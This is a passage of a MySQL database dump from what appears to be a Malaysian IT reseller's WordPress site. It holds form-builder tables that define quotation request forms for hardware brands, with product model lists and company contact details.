model)\";}','','Acer',6,0,'','yes','','','',''),(44,4,'address','text','','','Address',5,0,'','yes','medium','','',''),(45,5,'get-quotation-d-link','fieldset','','','Get Quotation (D-Link)',0,0,'','','','','',''),(46,5,'verification','verification','','','Verification',8,0,'','','','','',''),(47,5,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,46,'','yes','medium','','',''),(48,5,'submit','submit','','','Submit',10,46,'','','','','',''),(49,5,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(50,5,'email','text','','','Email',2,0,'email','yes','medium','','',''),(51,5,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(52,5,'message','text','','','Message',7,0,'','no','large','','',''),(53,5,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(54,5,'d-link-product','checkbox','a:15:{i:0;s:51:\"AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹\";i:1;s:44:\"2.4GHz Wireless N300 Outdoor Access Pointâ€‹\";i:2;s:45:\"AC1750 Wireless Dual-Band PoE Access Pointâ€‹\";i:3;s:43:\"N600 Wireless Dual-Band PoE Access Pointâ€‹\";i:4;s:45:\"AC1300 Wireless Dual-Band PoE Access Pointâ€‹\";i:5;s:33:\"N300 Wireless PoE Access Pointâ€‹\";i:6;s:55:\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\";i:7;s:49:\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\";i:8;s:55:\"10-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\";i:9;s:42:\"10 Gigabit Ethernet Smart Managed Switches\";i:10;s:48:\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\";i:11;s:67:\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\";i:12;s:71:\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\";i:13;s:67:\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\";i:14;s:32:\"Other (Please specify the model)\";}','','D-Link Product',6,0,'','yes','','','',''),(55,5,'address','text','','','Address',5,0,'','yes','medium','','',''),(56,6,'verification','verification','','','Verification',8,0,'','','','','',''),(57,6,'get-quotation-asus','fieldset','','','Get Quotation (Asus)',0,0,'','','','','',''),(58,6,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,56,'','yes','medium','','',''),(59,6,'submit','submit','','','Submit',10,56,'','','','','',''),(60,6,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(61,6,'email','text','','','Email',2,0,'email','yes','medium','','',''),(62,6,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(63,6,'message','text','','','Message',7,0,'','no','large','','',''),(64,6,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(65,6,'asus','checkbox','a:19:{i:0;s:23:\"ASUS ZenBook 13 UX331UN\";i:1;s:27:\"ASUS ZenBook Flip S UX370UA\";i:2;s:28:\"ASUS Transformer Book T101HA\";i:3;s:6:\"VP278H\";i:4;s:6:\"VZ249H\";i:5;s:6:\"VA326H\";i:6;s:6:\"VC239H\";i:7;s:6:\"PA329Q\";i:8;s:7:\"VP228HE\";i:9;s:7:\"MB169B+\";i:10;s:12:\"ASUSPRO E520\";i:11;s:16:\"ASUS Chromebox 3\";i:12;s:12:\"Mini PC PB60\";i:13;s:12:\"MINI PC PN60\";i:14;s:14:\"VivoMini UN65U\";i:15;s:16:\"VivoMini VC65-C1\";i:16;s:15:\"VivoMini VC65-C\";i:17;s:14:\"VivoMini UN68U\";i:18;s:32:\"Other (Please specify the model)\";}','','Asus',6,0,'','yes','','','',''),(66,6,'address','text','','','Address',5,0,'','yes','medium','','',''),(67,7,'verification','verification','','','Verification',8,0,'','','','','',''),(68,7,'get-quotation-belkin','fieldset','','','Get Quotation (Belkin)',0,0,'','','','','',''),(69,7,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,67,'','yes','medium','','',''),(70,7,'submit','submit','','','Submit',10,67,'','','','','',''),(71,7,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(72,7,'email','text','','','Email',2,0,'email','yes','medium','','',''),(73,7,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(74,7,'message','text','','','Message',7,0,'','no','large','','',''),(75,7,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(76,7,'belkin','checkbox','a:13:{i:0;s:46:\"3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰\";i:1;s:32:\"Ultra HD High Speed HDMIÂ® Cable\";i:2;s:70:\"Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible\";i:3;s:25:\"Mini DisplayPortTM to VGA\";i:4;s:18:\"Micro HDMI Adapter\";i:5;s:32:\"USB A/B Device Cable * A/B;DSTP;\";i:6;s:33:\"3.5 mm Audio + Charge RockStarâ„¢\";i:7;s:52:\"USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)\";i:8;s:45:\"3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)\";i:9;s:39:\"USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)\";i:10;s:50:\"USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)\";i:11;s:36:\"Lightning Audio + Charge RockStarâ„¢\";i:12;s:32:\"Other (Please specify the model)\";}','','Belkin',6,0,'','yes','','','',''),(77,7,'address','text','','','Address',5,0,'','yes','medium','','',''),(78,8,'verification','verification','','','Verification',8,0,'','','','','',''),(79,8,'get-quotation-broadbase','fieldset','','','Get Quotation (Broadbase)',0,0,'','','','','',''),(80,8,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,78,'','yes','medium','','',''),(81,8,'submit','submit','','','Submit',10,78,'','','','','',''),(82,8,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(83,8,'email','text','','','Email',2,0,'email','yes','medium','','',''),(84,8,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(85,8,'message','text','','','Message',7,0,'','no','large','','',''),(86,8,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(87,8,'optical-fiber-ethernet-media-converters','checkbox','a:26:{i:0;s:62:\"10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)\";i:1;s:62:\"10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)\";i:2;s:63:\"10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)\";i:3;s:63:\"10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)\";i:4;s:63:\"10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)\";i:5;s:63:\"10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)\";i:6;s:64:\"10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)\";i:7;s:58:\"100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter\";i:8;s:67:\"10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)\";i:9;s:68:\"10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)\";i:10;s:68:\"10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)\";i:11;s:68:\"10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)\";i:12;s:29:\"10/100/1000Base-T to SFP Slot\";i:13;s:63:\"1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter\";i:14;s:106:\"14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)\";i:15;s:78:\"16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)\";i:16;s:86:\"17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)\";i:17;s:86:\"17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)\";i:18;s:99:\"10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)\";i:19;s:95:\"10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)\";i:20;s:100:\"10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)\";i:21;s:80:\"1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter\";i:22;s:83:\"1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter\";i:23;s:87:\"1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter\";i:24;s:88:\"1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter\";i:25;s:32:\"Other (Please specify the model)\";}','','OPTICAL FIBER ETHERNET MEDIA CONVERTERS',6,0,'','yes','','','',''),(88,8,'address','text','','','Address',5,0,'','yes','medium','','',''),(89,9,'verification','verification','','','Verification',10,0,'','','','','',''),(90,9,'get-quotation-canon','fieldset','','','Get Quotation (Canon)',0,0,'','','','','',''),(91,9,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',11,89,'','yes','medium','','',''),(92,9,'submit','submit','','','Submit',12,89,'','','','','',''),(93,9,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(94,9,'email','text','','','Email',2,0,'email','yes','medium','','',''),(95,9,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(96,9,'message','text','','','Message',9,0,'','no','large','','',''),(97,9,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(98,9,'inkjet-printer','checkbox','a:9:{i:0;s:18:\"PIXMA E560 / E560R\";i:1;s:11:\"PIXMA E4270\";i:2;s:12:\"PIXMA TS9570\";i:3;s:12:\"PIXMA TS8270\";i:4;s:11:\"PIXMA G2010\";i:5;s:11:\"PIXMA G4010\";i:6;s:11:\"PIXMA G1010\";i:7;s:11:\"PIXMA G3010\";i:8;s:32:\"Other (Please specify the model)\";}','','Inkjet Printer',6,0,'','no','','','',''),(100,9,'laser-printers','checkbox','a:9:{i:0;s:18:\"imageCLASS LBP113w\";i:1;s:18:\"imageCLASS MF269dw\";i:2;s:18:\"imageCLASS MF266dn\";i:3;s:17:\"imageCLASS MF913w\";i:4;s:17:\"imageCLASS MF113w\";i:5;s:18:\"imageCLASS LBP913w\";i:6;s:17:\"imageCLASS MF525x\";i:7;s:18:\"imageCLASS MF426dw\";i:8;s:32:\"Other (Please specify the model)\";}','','Laser Printers',7,0,'','no','','','',''),(101,9,'cartridge','text','','Please specify the model','Cartridge',8,0,'','no','medium','','',''),(102,10,'verification','verification','','','Verification',9,0,'','','','','',''),(103,10,'get-quotation-epson','fieldset','','','Get Quotation (EPSON)',0,0,'','','','','',''),(104,10,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',10,102,'','yes','medium','','',''),(105,10,'submit','submit','','','Submit',11,102,'','','','','',''),(106,10,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(107,10,'email','text','','','Email',2,0,'email','yes','medium','','',''),(108,10,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(109,10,'message','text','','','Message',8,0,'','no','large','','',''),(110,10,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(111,10,'printers-for-work','checkbox','a:17:{i:0;s:36:\"Epson WorkForce Enterprise WF-C17590\";i:1;s:28:\"Epson WorkForce Pro WF-C5290\";i:2;s:22:\"Epson WorkForce WF-100\";i:3;s:23:\"Epson WorkForce WF-7711\";i:4;s:19:\"Epson EcoTank L3150\";i:5;s:18:\"Epson L120 Printer\";i:6;s:19:\"Epson M1100 Printer\";i:7;s:21:\"Epson AcuLaser C9300N\";i:8;s:24:\"pson WorkForce AL-M320DN\";i:9;s:26:\"Epson WorkForce AL-M8100DN\";i:10;s:16:\"Epson TM-H6000IV\";i:11;s:15:\"Epson TM-T88V-i\";i:12;s:14:\"Epson TM-T70II\";i:13;s:37:\"Epson L1800 A3 Photo Ink Tank Printer\";i:14;s:18:\"Epson L850 Printer\";i:15;s:18:\"Epson L805 Printer\";i:16;s:32:\"Other (Please specify the model)\";}','','Printers for Work',6,0,'','yes','','','',''),(112,10,'address','text','','','Address',5,0,'','yes','medium','','',''),(99,9,'address','text','','','Address',5,0,'','yes','medium','','',''),(113,10,'projectors-for-work','checkbox','a:12:{i:0;s:13:\"Epson EB-2055\";i:1;s:14:\"Epson EB-2142W\";i:2;s:14:\"Epson EB-L500W\";i:3;s:23:\"Epson LightScene EV-105\";i:4;s:14:\"Epson EB-1785W\";i:5;s:14:\"Epson EB-536Wi\";i:6;s:23:\"Epson 595Wi/585Wi/575Wi\";i:7;s:17:\"Epson EB-L1405UNL\";i:8;s:17:\"Epson EB-G7400UNL\";i:9;s:16:\"Epson EB-Z10000U\";i:10;s:23:\"Document Camera ELPDC21\";i:11;s:32:\"Other (Please specify the model)\";}','','Projectors for Work',7,0,'','no','','','',''),(114,11,'verification','verification','','','Verification',8,0,'','','','','',''),(115,11,'get-quotation-hpe','fieldset','','','Get Quotation (HPE)',0,0,'','','','','',''),(116,11,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,114,'','yes','medium','','',''),(117,11,'submit','submit','','','Submit',10,114,'','','','','',''),(118,11,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(119,11,'email','text','','','Email',2,0,'email','yes','medium','','',''),(120,11,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(121,11,'message','text','','','Message',7,0,'','no','large','','',''),(122,11,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(123,11,'product','checkbox','a:16:{i:0;s:31:\"HPE ProLiant DL325 Gen10 Server\";i:1;s:31:\"HPE ProLiant DL385 Gen10 Server\";i:2;s:23:\"HPE Apollo 6000 Chassis\";i:3;s:31:\"HPE ProLiant ML110 Gen10 Server\";i:4;s:31:\"HPE ProLiant ML350 Gen10 Server\";i:5;s:23:\"HPE Synergy 12000 Frame\";i:6;s:32:\"HPE Synergy D3940 Storage Module\";i:7;s:21:\"HPE StoreOnce Systems\";i:8;s:31:\"HPE 3PAR StoreServ 8000 Storage\";i:9;s:31:\"HPE 3PAR StoreServ 9000 Storage\";i:10;s:36:\"HPE FLexNetwork MSR95x Router Series\";i:11;s:41:\"Alcatel-Lucent 7750 Service Router Series\";i:12;s:36:\"HPE FlexNetwork MSR93x Router Series\";i:13;s:64:\"HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch\";i:14;s:59:\"HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch\";i:15;s:32:\"Other (Please specify the model)\";}','','Product',6,0,'','yes','','','',''),(125,12,'verification','verification','','','Verification',8,0,'','','','','',''),(126,12,'get-quotation-jabra','fieldset','','','Get Quotation (Jabra)',0,0,'','','','','',''),(127,12,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,125,'','yes','medium','','',''),(128,12,'submit','submit','','','Submit',10,125,'','','','','',''),(129,12,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(130,12,'email','text','','','Email',2,0,'email','yes','medium','','',''),(131,12,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(132,12,'message','text','','','Message',7,0,'','no','large','','',''),(133,12,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'','yes','small','','',''),(134,12,'product','checkbox','a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}','','Product',6,0,'','yes','','','',''),(124,11,'address','text','','','Address',5,0,'','yes','medium','','',''),(136,13,'get-quotation-dell-large-display','fieldset','','','Get Quotation (Dell Large Display)',0,0,'','','','','',''),(137,13,'verification','verification','','','Verification',8,0,'','','','','',''),(135,12,'address','text','','','Address',5,0,'','yes','medium','','',''),(138,13,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',9,137,'','yes','medium','','',''),(139,13,'submit','submit','','','Submit',10,137,'','','','','',''),(140,13,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(141,13,'email','text','','','Email',2,0,'email','yes','medium','','',''),(142,13,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'phone','yes','small','','',''),(143,13,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(144,13,'address','text','','','Address',5,0,'','yes','medium','','',''),(145,13,'message','text','','','Message',7,0,'','no','large','','',''),(146,13,'dell-large-display','checkbox','a:5:{i:0;s:6:\"C5519Q\";i:1;s:7:\"C5518QT\";i:2;s:6:\"C7017T\";i:3;s:7:\"C7520QT\";i:4;s:7:\"C8618QT\";}','','Dell Large Display',6,0,'','yes','','','',''),(149,14,'get-quotation-targus','fieldset','','','Get Quotation (Targus)',0,0,'','','','','',''),(150,14,'verification','verification','','','Verification',14,0,'','','','','',''),(151,14,'please-enter-any-two-digits','secret','','Example: 12','Please enter any two digits',15,150,'','yes','medium','','',''),(152,14,'submit','submit','','','Submit',16,150,'','','','','',''),(153,14,'full-name','text','','','Full Name',1,0,'','yes','medium','','',''),(154,14,'email','text','','','Email',2,0,'email','yes','medium','','',''),(155,14,'number-phone','text','','eg: 012 3456789','Number Phone',3,0,'phone','yes','small','','',''),(156,14,'company-name','text','','','Company Name',4,0,'','yes','small','','',''),(157,14,'address','text','','','Address',5,0,'','yes','medium','','',''),(158,14,'message','text','','','Message',13,0,'','no','large','','',''),(159,14,'docking-stations','checkbox','a:12:{i:0;s:49:\"USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station\";i:1;s:55:\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\";i:2;s:48:\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\";i:3;s:47:\"Universal USB 3.0 DV Docking Station with Power\";i:4;s:49:\"Universal USB 3.0 DV4K Docking Station with Power\";i:5;s:38:\"Universal USB 3.0 DV4K Docking Station\";i:6;s:47:\"USB-C Universal DV4K Docking Station with Power\";i:7;s:31:\"USB-C Universal Docking Station\";i:8;s:28:\"2K Universal Docking Station\";i:9;s:42:\"VersaLink Universal Dual Video Travel Dock\";i:10;s:41:\"USB-C DisplayPortâ„¢ Alt-Mode Travel Dock\";i:11;s:32:\"USB-C Alt-Mode Travel Dock w/ PD\";}','','Docking Stations',6,0,'','no','','','',''),(161,14,'tablet-cases','checkbox','a:16:{i:0;s:58:\"VersaVuÂ® Multi-Gen for 9.7â€³ IPad Pro, iPad Air 1, And 2\";i:1;s:62:\"3D Protectionâ„¢ Multi-Gen for 9.7 iPad Pro, iPad Air 1, and 2\";i:2;s:59:\"New Pro-Tek Rotating iPad 9.7â€³ 2018 / 2017 Pro, Air 1 & 2\";i:3;s:51:\"New Click-In iPad 9.7â€³ 2018 / 2017 Pro, Air 1 & 2\";i:4;s:50:\"New VersaVu iPad 9.7â€³ 2018 / 2017 Pro, Air 1 & 2\";i:5;s:60:\"New VersaVu Signature iPad 9.7â€³ 2018 / 2017 Pro, Air 1 & 2\";i:6;s:26:\"VersaVu 11-inch iPadÂ® Pro\";i:7;s:27:\"Pro-Tek 11-inch  iPadÂ® Pro\";i:8;s:27:\"Pro-Tek 11-inch  iPadÂ® Pro\";i:9;s:26:\"VersaVu 11-inch iPadÂ® Pro\";i:10;s:45:\"Pro-Tekâ„¢ Rotating Case 12.9-inch iPadÂ® Pro\";i:11;s:47:\"VersaVuÂ® Classic Case for 12.9-inch iPadÂ® Pro\";i:12;s:39:\"VersaVu Signature 12.9-inch  iPadÂ® Pro\";i:13;s:55:\"SafePort Rugged Case for 12.9-inch iPad (6th gen. / 5th\";i:14;s:40:\"Protect Case for Microsoft Surfaceâ„¢ Go\";i:15;s:40:\"Protect Case for Microsoft Surfaceâ„¢ Go\";}','','Tablet Cases',8,0,'','no','','','',''),(162,14,'dock-accessories','checkbox','a:4:{i:0;s:20:\"USB-C to USB-A Cable\";i:1;s:32:\"3-Pin 3-Way Hydra DC Power Cable\";i:2;s:25:\"USB-C Multiplexer Adapter\";i:3;s:32:\"USB-C Alt-Mode Travel Dock w/ PD\";}','','Dock Accessories',7,0,'','no','','','',''),(165,14,'apple-macbook','checkbox','a:5:{i:0;s:15:\"MacBook 12-inch\";i:1;s:17:\"MacBook 13.3-inch\";i:2;s:21:\"MacBook Air 13.3-inch\";i:3;s:17:\"MacBook 15.4-inch\";i:4;s:21:\"MacBook Pro 15.4-inch\";}','','Apple Macbook',9,0,'','no','','','',''),(166,14,'microsoft-surface','checkbox','a:1:{i:0;s:43:\"Microsoft Surface Pro 4 (12.3â€³) â€“ Clear\";}','','Microsoft Surface',10,0,'','no','','','',''),(167,14,'laptop','checkbox','a:10:{i:0;s:20:\"Screen 11.6â€³W 16:9\";i:1;s:21:\"Screen 12.1â€³W 16:10\";i:2;s:20:\"Screen 12.5â€³W 16:9\";i:3;s:21:\"Screen 13.3â€³W 16:10\";i:4;s:20:\"Screen 13.3â€³W 16:9\";i:5;s:21:\"Screen 14.1â€³W 16:10\";i:6;s:20:\"Screen 14.1â€³W 16:9\";i:7;s:19:\"Screen 14â€ W 16:9\";i:8;s:21:\"Screen 15.4â€³W 16:10\";i:9;s:20:\"Screen 15.6â€³W 16:9\";}','','Laptop',11,0,'','no','','','',''),(168,14,'monitor','checkbox','a:11:{i:0;s:17:\"Screen 17â€³W 4:3\";i:1;s:17:\"Screen 19â€³W 4:3\";i:2;s:19:\"Screen 19â€³W 16:10\";i:3;s:20:\"Screen 21.5â€³W 16:9\";i:4;s:19:\"Screen 22â€³W 16:10\";i:5;s:18:\"Screen 22â€³W 16:9\";i:6;s:18:\"Screen 23â€³W 16:9\";i:7;s:20:\"Screen 23.8â€³W 16:9\";i:8;s:19:\"Screen 24â€³W 16:10\";i:9;s:18:\"Screen 24â€³W 16:9\";i:10;s:18:\"Screen 27â€³W 16:9\";}','','Monitor',12,0,'','no','','','','');
/*!40000 ALTER TABLE `wpdp_visual_form_builder_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_visual_form_builder_forms`
--

DROP TABLE IF EXISTS `wpdp_visual_form_builder_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_visual_form_builder_forms` (
  `form_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_key` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `form_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `form_email_subject` text COLLATE utf8mb4_unicode_ci,
  `form_email_to` text COLLATE utf8mb4_unicode_ci,
  `form_email_from` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_email_from_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_email_from_override` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_email_from_name_override` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_success_type` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT 'text',
  `form_success_message` text COLLATE utf8mb4_unicode_ci,
  `form_notification_setting` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_notification_email_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_notification_email_from` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_notification_email` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_notification_subject` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_notification_message` text COLLATE utf8mb4_unicode_ci,
  `form_notification_entry` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `form_label_alignment` varchar(25) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_visual_form_builder_forms`
--

LOCK TABLES `wpdp_visual_form_builder_forms` WRITE;
/*!40000 ALTER TABLE `wpdp_visual_form_builder_forms` DISABLE KEYS */;
INSERT INTO `wpdp_visual_form_builder_forms` (`form_id`, `form_key`, `form_title`, `form_email_subject`, `form_email_to`, `form_email_from`, `form_email_from_name`, `form_email_from_override`, `form_email_from_name_override`, `form_success_type`, `form_success_message`, `form_notification_setting`, `form_notification_email_name`, `form_notification_email_from`, `form_notification_email`, `form_notification_subject`, `form_notification_message`, `form_notification_entry`, `form_label_alignment`) VALUES (1,'contact-us','Contact Us','Contact Us','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your form was successfully submitted. Thank you for contacting us.&lt;/p&gt;','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','6','Contact  Us','Thank You for contact us','',''),(2,'get-quotation-logitech','Get Quotation (Logitech)','Get Quotation (Logitech)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','16','Get Quotation (Logitech)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(3,'get-quotation-panasonic-toughbook','Get Quotation (PANASONIC TOUGHBOOK)','Get Quotation (PANASONIC TOUGHBOOK)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','28','Get Quotation (PANASONIC TOUGHBOOK)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(4,'get-quotation-acer','Get Quotation (Acer)','Get Quotation (Acer)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting us.','1','Bintara solutions Sdn Bhd','faiz@bintara.com.my','39','Get Quotation (Acer)','Dear Customer, \r\n&lt;br&gt;&lt;br&gt;\r\nThank you for choosing to do business with us. Your request is important to us and we will respond as soon as possible. \r\n&lt;br&gt;&lt;br&gt;\r\nHowever, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my \r\n&lt;br&gt;&lt;br&gt;\r\nThank You! \r\n&lt;br&gt;&lt;br&gt;\r\n\r\nSincerely, \r\n\r\n&lt;br&gt;&lt;br&gt;\r\nNor Faiz Muhammad Noor &lt;br&gt;\r\nBintara Solutions Sdn Bhd','',''),(6,'get-quotation-asus','Get Quotation (Asus)','Get Quotation (Asus)','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','info@bintara.com.my','Bintara solutions Sdn Bhd','','','text','&lt;p id=\\\"form_success\\\"&gt;Your request was successfully submitted. However, if your inquiry needs urgent attention, you can contact our sales team on +603-4266 3311 or info@bintara.com.my .\r\nThank you for contacting 